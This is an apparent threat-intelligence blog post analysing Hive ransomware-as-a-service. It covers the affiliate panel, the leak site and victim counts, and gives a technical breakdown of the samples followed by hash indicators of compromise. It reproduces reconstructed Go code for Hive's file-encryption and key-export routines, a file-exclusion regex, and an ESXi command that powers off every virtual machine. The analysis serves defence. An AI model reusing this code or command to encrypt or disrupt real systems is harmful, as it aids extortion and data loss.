ENGLISH
ENGLISH
09.12.2021

Inside the Hive

Deep dive into Hive RaaS, analysis of latest samples
Dmitry Shestakov
Head of Cybercrime Research at Group-IB
Andrey Zhdanov
Threat Hunter at the Group-IB DFIR Team
In the first 11 months of 2021, over 60% of all incidents investigated by Group-IB involved ransomware. Ransomware has finally established itself as cyber threat number one.

In July 2021, international media reported that REvil ransomware operators demanded a record-breaking ransom of $70 millions from meat giant JBS in exchange for providing the decryption key. The record didn't stand long. It took the ransomware empire less than half a year to grow this ransom demand 3-fold to $240 millions. In November 2021, Europe's largest consumer electronics retailer Media Markt fell prey to a ransomware attack. It turned out that the perpetrator behind the incident was Hive, which used to take a back seat. Both threat actors worked under the Ransomware-as-a-Service (RaaS) model and frequently released victim data on their DLS (data leak sites, where the data belonging to companies that refuse to pay a ransom is published).
The main factors behind the rise of the ransomware empire were the use of the double extortion technique based on DLS, the active development of the RaaS program market, as well as the increasing popularity of ransomware programs among financially cybercriminals who used to have a more difficult way to make money.

According to the "Hi-Tech Crime Trends 2021/2022. Part II. Corporansom: threat number one" released earlier in the day, the number of victims whose data has been published on DLSs has grown by unprecedented 935% from 229 to 2,371 during the period from H2 2020 to H1 2021 compared to the corresponding period a year earlier. Despite the "protests" of several underground forum administrators united by the "No more ransom!" motto, in the review period, 21 new partner programs emerged, which is a 19-percent increase year-on-year.

As the entire world was watching REvil's forced rebranding, the victim count of ransomware Hive, which appeared in June 2021, continued to surge. If one tried to evaluate Hive's private affiliate program based on the number of victims whose data was released on DLS (48), they wouldn't be impressed.

On closer examination, this RaaS program turns out to be one of the most aggressive ones, with Hive operators using the most urgent methods of pressure on the target organizations and distinctive TTPs, which arу worth being examined.

For technical experts, the blog post authors have included dedicated parts with info on methods and approaches that can be used to hunt for Hive operators. They also present a comprehensive analysis of the Hive ransomware sample, indicators of compromise, and YARA rules, which should help analysts identify the Hive attacks.

Hive affiliates have been busy as bees: the actual number of their victims is in the hundreds despite the fact that the affiliate program has been active less than half a year. Due to Hive DLS's specific characteristics and its admin panel, Group-IB Threat Intelligence analysts have managed to determine that as of October 16, 2021, at least 355 companies fell victim to the threat actor.

Hive affiliates resort to various initial compromise methods: vulnerable RDP servers, compromised VPN credentials, as well as phishing emails with malicious attachments. The data encryption is often carried out during non working hours or at the weekend. Taking into account that Hive targets organizations from various economic sectors from all around the world and their attacks are manually controlled by the affiliates, it's crucial to closely monitor the changes in TTPs of these ransomware operators.

Group-IB Digital Forensics and Threat Intelligence teams have analyzed the latest available samples of Hive and for the first time analyzed the affiliate program from the inside, having tracked down it to its creation.

More information about RaaS affiliate programs, the most noticeable ransomware samples, tactics, techniques, and tools used by threat actors, as well as events in the dark web that led to the rise of the ransomware empire can be found in "Hi-Tech Crime Trends 2021/2022. Part II. Corporansom: threat number one" report.
    Inside Hive Ransomware-as-a-Service
    Among the first victims of Hive ransomware was Altus Group, attacked on June 23, 2021. One month later, on July 25, the information about this Canadian IT company was listed in the newly created Hive's DLS.
      First victim on Hive's DLS
      Hive did not have any public affiliate programs, so it was initially unclear whether the group was using the RaaS business model or was an impossible-to-join private group.

      The user kkk posted a message on the private underground forum RAMP on September 7, 2021, advertising an affiliate program.
      The threat actor kkk provided detailed information about the malware used in the affiliate program. From the description it became clear that the threat actor was most likely referring to Hive ransomware.
      The threat actor kkk sent a one-time note with a full technical description of the ransomware (translated from Russian), 2021
      The threat actor also provided access to a private ransomware affiliate program. The access page made it clear that it was a Hive RaaS operation.
      Hive admin panel login page
      After authorization to the admin panel, Hive's affiliates can see the home page with a brief summary and key statistics: what percentage of the ransom is paid to the Hive affiliates, how much money they can expect to be paid in the future, and how much they have received so far, as well as the number of companies that have paid up,have had their data encrypted and whose data was published on DLS. The total balance and the username (blurred in the screenshot below) are also displayed.
      The home page of the Hive affiliate program
      Under the "companies" tab, Hive's affiliates can record the victim company's name and website, a brief description, and sometimes its annual revenue and the number of employees.
      Creating a new victim company's profile in the Hive affiliate program
      After entering the victim's details, the Hive affiliates can leave a comment for the admin and update the victim's details. On the right side of the page, the affiliates can build a Hive ransomware kit to use in a future attack and make a note about whether encrypting the company's data was successful.

      Building the ransomware kit may take up to 15 minutes. If a company refuses to pay the ransom, it is possible to add a link that will be posted on the Hive DLS.
        Generating ransomware kit within the Hive affiliate program
        After the ransomware is created, an archive is generated containing the following files:
          Archive containing Hive ransomware
          After a victim is infected, a ransom note containing a link to the website as well as the access login and password would be generated automatically .
          Hive ransom note
          If the affiliate ascertains that the company was encrypted, a chat with the victim — Hive's "sales department" — will open. At the time of research, communication of Hive affiliated with the victim was as follows:
          1
          The victim writes a message to the admin (on the left), which is visible to the Hive affiliate as well
          2
          The affiliate writes a message to the admin (on the right)
          3
          The admin relays the message to their chat with the victim
          Hive's Sales Department
          The attacked organizations sometimes try to argue with the Hive admins about the company's revenue.
            Chat between the victim company and Hive admin
            After the victim pays the ransom, they are allowed to download the decryptor with a step-by-step guide on how to use it.
            Decryptor in the Hive affiliate program
            However, some victims claim they experienced problems decrypting their data after receiving the decryptor.
            Malfunctioning of Hive decryptor
            Actual number of Hive victims and technical features of the gang's DLS
            Throughout its history, the Hive DLS featured information about 48 companies (including those whose data had been removed from the DLS at some point), which refused to pay the ransom. Most of the victim-companies are from the United States. The main industries targeted by Hive are IT and real estate.

            Curiously, every affiliate of the Hive RaaS has access to all the company's IDs in the database. Hive's DLS and admin panels are running through API. Only two groups besides Hive have used API: Grief and DoppelPaymer.

            Each victim company is assigned a unique ID which can also be found on the DLS. The profile also includes the number of messages that the victim and the criminal have exchanged.
            Victim company data: IDs and the number of chat messages with the Hive "sales department"

            But an API error has enabled the Group-IB Threat Intelligence team to identify the exact number of attacks as well as to make an assumption about the number of companies that paid the ransom to keep their data confidential. By October 16, Hive's API held records of 312 companies that most likely fell victim to Hive's operators. The data about 48 out of them was released on DLS.

            Based on the analysis of company data obtained through API, the number of victims grew by 72% in less than one month. On September 16, the total number of records related to victim-companies was 181. Just one month later, on October 16, the number increased to 312. Notably, 43 companies listed as victims in September disappeared from API in October, most likely after paying the ransom.

            When adding the number of unique company IDs obtained through Hive's API in October (312) and the number of companies whose data disappeared from API between September and October (43), we can get the total number of Hive's attacks amounting to 355.

            It was also discovered that 104 companies out of 312 had negotiated with Hive's operators and their data had not been listed on DLS.

            By October 16, the data of only 34 companies out of 48 remained on Hive's DLS — the information about 14 victims, who most likely agreed to pay the ransom, had been wiped from DLS and API. Most of the 34 victims listed on DLS by October 16 did not negotiate with the Hive operators.
            Hive ransomware analysis
            As it was mentioned earlier, for each upcoming attack of their affiliates, Hive RaaS owners build a personalized ransomware kit. This kit contains different versions of the ransomware customized for various operating systems:

            Except for the ESXi version, Hive ransomware samples were built using the Go (Golang) language and have a common source code except for the part specific for each operating system. The file encryption algorithm is identical for all Hive versions.

            To hinder detection and analysis, most Hive samples written in Go are obfuscated. The samples also have timestamps removed and other identifying features missing, e. g. (Go Build ID).
            We highlighted three versions of Hive ransomware:
            1
            v1
            from June to July 2021 (inclusive)
            2
            v2
            from August to mid-September 2021
            3
            v3
            from mid-September 2021 to the present moment

            Samples for Windows v1 and v2 were compressed using a file packer UPX. The first version uses ".hive" extension for encrypted files, while in later versions it is unique for every individual victim.
            When building each ransomware kit, the following data is generated:
            a unique extension for encrypted files (victim's identifier) "xxxxx" (where x is any of the symbols '0'-'9', 'a'-'z'), e. g., "y1iiu"
            a unique text file name containing the ransom demand "XXXX_HOW_TO_DECRYPT.txt" (X is any of the symbols '0'-'9', 'A'-'Z', 'a'-'z'), e. g.: "XGTb_HOW_TO_DECRYPT.txt"
            20 pairs of RSA keys of various length (from 2048 to 5120) (in the previous Hive versions – 100 pairs of keys)
            victim's credentials to access their personal page on the Hive website: login (12 symbols) and password (20 symbols)

            This data except for the private RSA keys are used to compile various versions of the ransomware kit.
            Hive for Windows
            Hive ransomware for Windows is available in two versions: the hidden one (GUI) and the console one (CUI). In the console version, the encryption process is displayed in the console window. Before encryption, the ransomware stops system services, terminates processes, deletes shadow copies, and changes permissions to access all files. After finishing the encryption process, ransomware wipes empty disk space with random data to prevent file recovery.

            File encryption is performed for all logical drives and available network resources or directories/resources, paths to which are provided in the command line.

            At the last stage, the ransomware displays a text file containing ransom demand and deletes itself.

            Hive ransomware for Windows uses the following regular expression to exclude files from encryption:
            "(?i:[WIN_DIR]|\.(?:386|adv|ani|bat|bin|cab|cmd|com|cpl|cur|deskthemepack|diagcab|diagcfg|diagpkg|dll|dr
            v|exe|hlp|hrmlog|hta|icl|icns|ico|ics|idx|ini|key|lnk|lock|log|mod|mpa|mp3|msc|msi|msp|msst
            yles|msu|nls|nomedia|ocx|prf|ps1|rom|rtp|scr|shs|spl|sys|theme|themepack|url|wpx)$|
            (?:autorun\.inf|bootfont\.bin|boot\.ini|bootsect\.bak|desktop\.ini|iconcache\.db|ntldr|ntuser\.
            dat|ntuser\.dat\.log|ntuser\.ini|thumbs\.db)$|\\\$recycle\.bin|\$windows\.~bt|\$windows\.~
            ws|Allusers|appdata|applicationdata|boot|google|intel|Microsoft|mozilla|Mozilla|Msbuild|ms
            ocache|perflogs|systemvolumeinformation|torbrowser|windows|Windowsnt|windows\.old)\\|(\$\\Windows\\|\\ADMIN\$|\\IPC\$)|(?:^$))"

            WIN_DIR is a path to the Windows directory.
            Command line parameters

            Depending on the ransomware build, the combination of command line parameters can differ to a certain extent.
            Hive for Linux/FreeBSD
            Hive's Linux/FreeBSD ransomware terminates non‑root processes, scans and encrypts the files in the root directory (/) or in the directories displayed in the command line. To prevent file restore, it can fill disk space with random data.
            Command line parameters:
            Hive for ESXi
            Hive's ESXi version is aimed at encrypting virtual machine files.

            Before encrypting the files, ransomware stops virtual machines with the following command:
            vim-cmd vmsvc/getallvms | grep -o -E '^[0-9]+' | xargs -r -n 1 vim-cmd vmsvc/power.off
            Command line parameters:
            Technical analysis of file encryption implementation in Hive
            In this article we will examine the file encryption algorithms implemented in the latest versions of Hive. In the previous versions, the encryption was implemented in a similar way, therefore the following results of the technical analysis will also give a general idea of the implementation of encryption in earlier versions.

            For a detailed representation of the described elements, we will use a programming language Go, which Hive developers wrote their malware in. Most functions will be called by the terms which are similar to those used by Hive developers. The code presented below has been slightly simplified, but it is consistent with the algorithms laid down by Hive developers.
            Two main data structures used in Hive ransomwares:
            // Key table structure
            type EncryptionKeyTab struct {
              Data []byte
              Hash []byte
            }
            
            
            // HiveContext structure
            type HiveContext struct {
              KeyTab *EncryptionKeyTab
              RansomExt string
              RansomNoteName string
              RansomNote string
              FileSkipList string
              SkipWipe bool
              NumThreads int
              CmdArgs []string
              FileSkipRegexp *regexp.Regexp
              SkipRegexp *regexp.Regexp
              EncSkipRegexp *regexp.Regexp
              ServiceStopList string
              ProcessKillList string
              GrantPermissions bool
              ProcessKillRegexp *regexp.Regexp
              ServiceStopRegexp *regexp.Regexp
            }
            EncryptionKeyTab is the structure of the encryption key table.

            HiveContext is the structure containing the main Hive ransomware's data, such as file contents encryption key table, software configuration data (the extensions of the encrypted files, the name of the file containing ransom demand and its contents, lists of processes and services), command line arguments, compiled regular expressions, etc. Depending on the build of the sample, the structure of HiveContext can slightly differ.
            Hive main function:
            // Hive main function
            func (ctx *HiveContext) RunProcess() {
            
              ctx.Init()
            
              ctx.ExportKey()
            
              ctx.Preprocess()
            
              ctx.PreNotify()
            
              ctx.ScanFiles()
            
              ctx.EncryptFiles()
            
              ctx.EraseKey()
            
              ctx.Notify()
            
              ctx.WipeSpace()
            
              ctx.Postprocess()
            }
            As its name suggests, the Init function initializes the program: it receives its working parameters and fills in the appropriate fields of the HiveContext structure.
            Key table
            At the start, Hive ransomwares generate a key table for encrypting file contents in the form of an array of random data 1 MB (1 048 576 bytes) in size. To generate the key table, the malware uses a standard function rand.Read from the Go cryptographic package "crypto/rand".
            // Hive initialization
            func (ctx *HiveContext) Init() {
            
              mathrand.Seed(time.Now().UnixNano())
            
              // Generate key table
              ctx.KeyTab = GenKeyTab()
            
              // Etc
              …
            }
            
            
            // Generate key table
            func GenKeyTab() *EncryptionKeyTab {
            
              data := make([]byte, 0x100000, 0x100000)
              cryptorand.Read(data)
            
              var keytab EncryptionKeyTab
            
              keytab.Data = data
            
              hash := sha512.Sum512_256(data)
            
              keytab.Hash = hash[:]
            
              return &keytab
            }
            As can be observed in the GenKeyTab function, after generating a key table, an additional hash SHA512-256 of its contents is calculated via the sha512.Sum512_256 function from the Go package "crypto/sha512". Consequently, the value of this hash, which is 32 bytes in size, will be repeatedly used in the software.

            After completing the initialization of the Init program, a generated key table is exported. And here Hive developers showed quite an original approach.
            // Export key table
            func (ctx *HiveContext) ExportKey() {
            
              // Import RSA public keys
              pubkeys := ImportRSAPubKeys()
            
              // Encrypt key table
              enc_keytab := ctx.KeyTab.Export(pubkeys)
            
              key_name_data := append(ctx.KeyTab.Hash, 0xFF)
            
              key_name := base64.URLEncoding.EncodeToString(key_name_data)
            
              key_filename := key_name + ".key." + ctx.RansomExt
            
              // Save encrypted key table to file
              …
            }
            
            
            // Import RSA public keys
            func ImportRSAPubKeys() []*rsa.PublicKey {
            
              var pubkeys []*rsa.PublicKey
            
              for i := 0; i < len(RSAPubKeyDerDataList); i++ {
            
                pubkey, _ := x509.ParsePKCS1PublicKey(RSAPubKeyDerDataList[i])
            
                pubkeys = append(pubkeys, pubkey)
              }
            
              return pubkeys
            }
            As we mentioned before, the body of the malware contains 20 public RSA keys of various lengths (from 2048 to 5120) in the DER format. Initially, the keys are stored in the encrypted form, and when the malware starts, they are decrypted and placed in a global list that we called RSAPubKeyDerDataList. To use these RSA keys for key table encryption, they are imported beforehand.

            The contents of the keytab are encrypted by blocks via encryption algorithm RSA-OAEP with iterative use of the 20 above mentioned RSA keys. The size of each block is equal to the maximum acceptable size of the encrypted data, which is defined by the length of the corresponding RSA key.
            // Encrypt key table
            func (keytab *EncryptionKeyTab) Export(pubkeys []*rsa.PublicKey) []byte {
            
              dst_data := make([]byte, 0, 0x200000)
            
              pos := 0
              rem_len := len(keytab.Data)
              num_keys := len(pubkeys)
            
              i := 0
            
              for rem_len > 0 {
            
                pubkey := pubkeys[i % num_keys]
            
                chunk_size := pubkey.Size() - (2 * 32 + 2)
                if chunk_size > rem_len {
                  chunk_size = rem_len
                }
            
                hash := sha512.New512_256()
            
                rng := cryptorand.Reader
            
                enc_chunk, _ := rsa.EncryptOAEP(hash, rng, pubkey,
                                                keytab.Data[pos : pos + chunk_size],
                                                nil)
            
                dst_data = append(dst_data, enc_chunk...)
            
                pos += chunk_size
                rem_len -= chunk_size
                i++
              }
            
              return dst_data
            }
            Encrypted in such a way, the key enc_keytab is then saved in the root directories of logical drives under the following file name:
            [KEY_NAME].key.[RANSOM_EXT]
            KEY_NAME is the name of an encrypted key table 44 symbols long, received as a result of converting the original key table contents' hash into the Base64 string with adding the 0FFh byte at the end (33 bytes total). To convert to Base64, the following table of Base64 symbols is used:
            ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_
            RANSOM_EXT is a configuration parameter that defines an extension for encrypted files.
            For example, the name
            sb8SzAPVNWhK66-6cahq7Ah8gGmOJCykPSI5D07wFMH_.key.xxxxx
            corresponds to the following hash of the key tab contents.
            File content encryption
            Now let's have a look at the most interesting part – the implementation of file contents encryption.
            File encryption function presented in the Go language:
            // Encrypt file
            func (keytab *EncryptionKeyTab) EncryptFilename(filename string,
                                                            ransom_ext string) error {
            
              n1 := mathrand.Uint32()
              n2 := mathrand.Uint32()
            
              var ext_data [42]byte
            
              copy(ext_data[:32], keytab.Hash)
              ext_data[32] = 0xFF
              *(*uint32)(unsafe.Pointer(uintptr(unsafe.Pointer(&ext_data[33])))) = n1
              *(*uint32)(unsafe.Pointer(uintptr(unsafe.Pointer(&ext_data[37])))) = n2
              ext_data[41] = 0x34
            
              file_ext := base64.URLEncoding.EncodeToString(ext_data[:])
            
              new_filename := filename + "." + file_ext + "." + ransom_ext
            
              err := os.Rename(filename, new_filename)
              if err != nil {
                return err
              }
            
              // Encrypt file data
              return keytab.EvaluateFilename(new_filename, n1, n2)
            }
            For each file, two random 32-bit numbers, n1 and n2, are generated. In this case, to generate numbers, a standard pseudorandom sequence generator from the Go "math/rand" package is used. As seen above, in a fragment of the Init function a pseudorandom sequence is generated using the current time set on the victim's system:
            mathrand.Seed(time.Now().UnixNano())
            These two random numbers are used to form the name of the encrypted file, and, notably, to encrypt the file data. After that, the file is renamed and encrypted.

            This is how the name of an encrypted file looks like:
            [FILE_NAME].[ENCRYPTED_EXT].[RANSOM_EXT]
            FILE_NAME is the name of the original unencrypted file.

            ENCRYPTED_EXT is the extension of the encrypted file, 56 symbols long, which is received as a result of converting the original key table contents' hash into the line Base64 with adding the following data at the end: the 0FFh byte, 32-bit numbers n1 and n2 (little-endian byte sequence) and the 34h byte (42 bytes total).

            RANSOM_EXT is a configuration parameter that defines extensions of the encrypted files.
            For example, the name
            filename.ext.sb8SzAPVNWhK66-6cahq7Ah8gGmOJCykPSI5D07wFMH_0Xg0sk1aRdc0.xxxxx
            corresponds to the following data:
            In this case, the numbers n1 and n2 have the values 0B23478D1h and 0D7455A4Dh respectively.

            In Hive, files are encrypted by blocks 4096 bytes in size, with the maximum number of blocks encrypted within a file amounting to 25, which corresponds to 102,400 bytes of encrypted data. There can be an interval separating the encrypted blocks, the size of which if defined by the file size. The encryption is implemented using byte-by-byte XOR with two byte sequences from the keytab 102,400 bytes and 3,072 bytes respectively. The starting positions in the sequences are defined using the n1 and n2 numbers respectively.
            File contents encryption code:
            // Encrypt file data
            func (keytab *EncryptionKeyTab) EvaluateFilename(filename string,
                                                             n1 uint32,
                                                             n2 uint32) error {
            
              f, err := os.OpenFile(filename, os.O_RDWR, 0600)
              if err != nil {
                return err
              }
            
              defer f.Close()
            
              file_info, err := f.Stat()
              if err != nil {
                return err
              }
            
              file_size := file_info.Size()
            
              var num_blocks int = int(30 * (file_size / 4096) / 100)
            
              if file_size == 0 {
                return nil
              }
            
              if file_size <= 4096 {
                num_blocks = 1
              } else if (num_blocks < 2) {
                num_blocks = 2
              } else {
                if (num_blocks > 25) {
                  num_blocks = 25
                }
              }
            
              key_data1_pos := n1 % 0xE7000
              key_data1 := keytab.Data[key_data1_pos : key_data1_pos + 0x19000]
            
              key_data2_pos := n2 % 0xFF400
              key_data2 := keytab.Data[key_data2_pos : key_data2_pos + 0xC00]
            
              var buf [4096]byte
            
              var total_pos int = 0
            
              var block_space int64
            
              if num_blocks > 1 {
                block_space = 0
              } else {
                block_space = (file_size - int64(num_blocks * 4096)) /
                              int64(num_blocks - 1)
              }
            
              for block_num := 1; block_num <= num_blocks; block_num++ {
            
                var file_off int64
            
                if block_num == 1 {
                  file_off = 0
                } else if block_num == num_blocks {
                  if file_size > file_off + 4096 {
                    file_off = file_size - 4096
                  }
                } else {
                  file_off += int64(block_space)
                }
            
                bytes_read, err := f.ReadAt(buf[:], file_off)
                if (err != nil) && (err != io.EOF) {
                  return err
                }
            
                if bytes_read == 0 {
                  break
                }
            
                // Encrypt block
                for i := 0; i < bytes_read; i++ {
                  pos := total_pos + i
                  buf[i] ^= key_data1[pos % 0x19000] ^ key_data2[pos % 0xC00]
                }
            
                _, err = f.WriteAt(buf[:bytes_read], file_off)
                if err != nil {
                  return err
                }
            
                file_off += int64(bytes_read)
                total_pos += bytes_read
              }
            
              return nil
            }
            When the files are encrypted, the file encryption key table is erased from the system's memory (EraseKey function). Therefore, to decrypt each file, the initial encryption key table is required, as well as the values of n1 and n2 numbers are required, extracted from this file name.

            From threat actors' point of view, the main advantages of this approach to file encryption are the file size, which remains unchanged after the encryption, and the encryption speed. High encryption speed is also determined, among other factors, by the original file size. As opposed to many other ransomware samples, Hive does not write its metadata directly in the encrypted file. This advantage additionally complicates file recovery process, since the operating system will likely rewrite data in the same clusters. This system, however, does not look ideal when it comes to stability.

            In comparison, in the previous Hive versions the key table size amounts to 10 MB and the number of RSA keys used to encrypt it reaches 100. Content encryption is also performed using a similar algorithm based on the byte-by-byte XOR.


            Indicators of compromise
            SHA-256
            Hive v1 for Windows
            1e21c8e27a97de1796ca47a9613477cf7aec335a783469c5ca3a09d4f07db0ff

            2f7d37c22e6199d1496f307c676223dda999c136ece4f2748975169b4a48afe5

            50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609

            5954558d43884da2c7902ddf89c0cf7cd5bf162d6feefe5ce7d15b16767a27e5

            5ae51e30817c0d08d03f120539aedc31d094b080eb70c0691bbfbaa4ec265ef3

            612e5ffd09ca30ca9488d802594efb5d41c360f7a439df4ae09b14bce45575ec

            77a398c870ad4904d06d455c9249e7864ac92dda877e288e5718b3c8d9fc6618

            88f7544a29a2ceb175a135d9fa221cbfd3e8c71f32dd6b09399717f85ea9afd1

            a0b4e3d7e4cd20d25ad2f92be954b95eea44f8f1944118a3194295c5677db749

            bf7bc94506eb72daec1d310ba038d9c3b115f145594fd271b80fbe911a8f3964

            c04509c1b80c129a7486119436c9ada5b0505358e97c1508b2cfb5c2a177ed11

            c29bf72d010c32acd23ca20e473dadfbe28db7d7e68971ac94cbe9d35dd3853d

            db23ad5a44f67332cbc3d504260ec4742acb9f26373c4ef13f2ab0095a72bf6e

            dd1c58c48d46cce9ef92a730687f87d97bdb9d9bad51034177543e3833fa7ccb

            e1a7ddbf735d5c1cb9097d7614840c00e5c4d5107fa687c0ab2a2ec8948ef84e

            f99eace78d92e533bf03347824fc3a16adb33b6a88f4fb3675083496a9757fa1

            fdbc66ebe7af710e15946e1541e2e81ddfd62aa3b35339288a9a244fb56a74cf
            Hive v2 for Windows
            25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5

            4fe989185c5c4c308046262f8c480d6d45224ec7e24261563c0f164b4d5f379b

            5bc8f4aa3eadc95f7235a10f6d3b257d4b3c3c6e3c0418326fd4c8f2da33d984

            62d52ee299eafe3b05df8dc5110f39886073c1848aa9db02ff1bf1123f6fdfbe

            67ab2abe18b060275763e1d0c73d27c1e61b69097232ed9d048d41760a4533ef

            b0508de411dec856dbf88c5f2dc4255c656a8388f00debc3eaa5d952d66ef3b7
            Hive v2 for Linux
            6983ef6e484c0c70356d6f868ac03bc90a1055560642706743511f76aa6f28ad

            d5837ce670bcdf565e7648f0d43bad6232292163c3a123bfa108ee319e7df373
            Hive v3 for Windows
            0e8e6fc94e6eb17cfd8993b3dcfd9acd11ee32f1b4e956df3097ae3259be4f9c

            104dd21cc4403680d3f2d4372c2c49cd78eee66683d89d432e8b43fad2568f85

            122e397dc3a55143bd276d6ff3bc04a05601fbf390aa52a19274456ca0040a28

            12baa6c83e6f8b059e7f14cb67bdad4e917b90bc8a139b5379a4b42a0c92a6be

            1670e8bb8065d23e1b93ed8173f079f338abef880047da21af95dd4db57e20bd

            16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1

            191fd802cb6f922684cd32f51ea33b6106507c75b5baedd27a61b13cfee8a14b

            1ad94ad45b3c0097b9d4a69f6331c5f4f8113e8b5f5d4bcd103c690e66ca7f12

            20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042

            23f9744316621d583cc811663b620df5d92c3de4554a82a863c9c974c38ccaf1

            25793a0764a51b38806b7dcf5f5d8df9620f090f72362aa03187c8813e054482

            25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d

            27cb6c7baa77bd84c21e29c75365c6990c69d0d9134e0f9272f3444aacba4488

            28518da0336e8e2e48f598dc23d6312e8567f1d088d3b20993f643a8f0e1c6ad

            2a6befff9aba5700d5719a998996a5aa5fe67c7ca6c763cf498a10bac099a511

            30414f35f5ae50c9133017c6100b6f82dca0ca872ac6fbcf159b7b1d2303664f

            30cdf54a171a4f4f0ce0c69b6934468bab228f5dd9f9b2a39a6b5e968f3c6565

            36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e

            3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21

            3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43

            400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278

            44a69c3d760c8cc90e205564c9a351620a24facb504a24cffb2742061d873654

            44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442

            47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35

            50b2b256e60cb0fc50976b4216a28b3de8e736e2035d7c3cd59a5822c8770d2e

            514cd2d5751d3bbb5a7bbf0b5733edaf3ac755b1dceb5b1e7a4155de87058983

            56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747

            5a991404956e8c12450424bfc0fe49600c3b7988ac0766df044f56dd93720155

            5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584

            5d95bf2518918422a6cac03f90548f02a5848dbc43836868636b61d0a87ed968

            5edbbfd33d034b1a877cde0d2d20d3937aad7f1b6ff922168bab7bda8d6ff494

            638cc41ca18feccf21b7ed1b71fe0b0881b592647fd286276dff6a4e48992bfa

            6920e86a65fc94f9fd46c46c09187b802a13801904e06c6aa63c10e0c9197218

            693e43e6524610a91f66f692325ff3aead9c426d587c2dcfda7c9c15773f1895

            7cb5b1edd62718c8e42d2b56ddfc8a1152da8b3907eedc85f49d43d0ce8b44b2

            7fb0391651fff5ea815395dd278986dc23af9e91036ce178dd25951758ea94c6

            8a461e66ae8a53ffe98d1e2e1dc52d015c11d67bd9ed09eb4be2124efd73ccd5

            8af39d53b7b9e57995003b9c22dbcad3823dd739ad8586011be57be9b9adfeb6

            8fb3e954a8d73eb29a7ee8a17d405b8fca0235c9e0a919e3dd0214933d89a98b

            97a6a4124b7a76845d65780bd44aa323532c783f008ae11a6c17bb5f7832a13a

            a1621732042fc5b3a10ee9d31f5d92834a80668deae52c0aa5c18ea8d4c72d43

            a2ad0442cebe3e6abb86069a3b66b471b4a7c9d00286da4b8114d17a849128d6

            a4878bb4655f21dd34b5a8a853ebea6b9cca292190c6ca180b4afe44077002ab

            a4e6aac8e9a84886f84059e4b56ab1cfccd740690cdfb1d6860cbac02f034b21

            aa4ffa5e1711e83d0fca382106ace09df4c55c602b8661e72f32ef5ee80c527c

            acecf1f8fc1bde7b57412e3ceb610035ef6f82bb350c22fb9e780dfa7e46e329

            c1ed5916533b122bdbcb20e4a14473639f691b69f9adfc310e2d6589f3da15a7

            c3732c95df41b283317330db117210bf55262d3a8f4ad2d3d2ee40626641d960

            cafdc2624a909f037caeb2fb1fb89072d91ac3f2ba0b90dcfa873e01a6934c9c

            cba0c8e316db8c6abcdb69f03936a803d81299d9ae4c59c77839c37cda752539

            b1bfc90de9dcea999dedf285c3d3d7e1901847d84ec297224a0d82720d0ed501

            be1565961e123f52e54e350e0ca2666f8ffa42fdc46df18dca6f7c0ac2b43d23

            bd9807c6e5c69f21153103703faa8067a9a883124bcfeb6b0f0645158a97d57d

            d0ceb8f5170972fe737ab9cbdd6f3ee472fbe62e244cccc46d137094d33f1afc

            d57f99908a8b4e50a1ace66ed0d84792d2765bed945247160b5d8c874fca492f

            d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac

            d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33

            da2128b5608ed39f1a4e4568e0751bd9f8cb4e8587f1a262314d13c03a6a8b9e

            dd1e4842111c38d0d24deecd6aeb830d9d90bce19df0ffd839d5cfc7a565c0ae

            de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf

            e6a7d1575ad6be033d4caada4341835175e85f859d304d292ae3968dd97d682d

            e9def82da36450f16c48af3abbba2a31f53c9c2f6fae6cf895fbf10698c04ed2

            ea6ee7a35e964b84c59eba34384ea9dd6aa1e951a2d9424f5991b364a7d685bf

            ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef

            ed55da207686f136205db1226c23add2bba331794de6f2c0b0861681cf344226

            f4a387624049baa6f7400ef71282ce244499be904651ee70ef145c07bee8e151

            f56b69b2ed6fb623f9e112eb9ae52a057cba260b85ef9bb789b5e4f8f7faadfd

            f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16

            ff93136112316cea3f80218c5354d6e8c12cdfe449c40ab417002fe81dcf1dcb
            Hive v3 for Linux
            12389b8af28307fd09fe080fd89802b4e616ed4c961f464f95fdb4b3f0aaf185

            448e8d71e335cabf5c4e9e8d2d31e6b52f620dbf408d8cc9a6232a81c051441b

            6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0

            713b699c04f21000fca981e698e1046d4595f423bd5741d712fd7e0bc358c771
            Hive v3 for FreeBSD
            bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3

            cac027eed3a92cd1b24745fa0b182bdc76839edf276a672ab66c311ae61de3fe
            Hive v3 for ESXi
            822d89e7917d41a90f5f65bee75cad31fe13995e43f47ea9ea536862884efc25
            Hive Decryptor v3
            00dc667e31c607838c8fe69494eaa45bcaba1b737973d3842643c22477eab1f1

            0daac12ef83d0c5d893bb0a56ef90bf4e1c4e9938d33502b9780d67c9ad7dfad

            1357e734118202f3277c6e9976f08d53c17d0b083992028117643eb2d465a50b

            13903ef99700ab30e6f13d3579d99acaac3a9730b01720092c4e85f13152588b

            1a798bdc62d9ec900a67c72b57cd8eed2b6b6b78367e93abb08cf91f72e36f0d

            222d210e12e2fe32545af6eadfdbf0eb0638a6d132e5c9821daa04bb5b197b5a

            2f573f7ed5d3ffc47aa0d095d3861030372074b214e2607021236c744cde6614

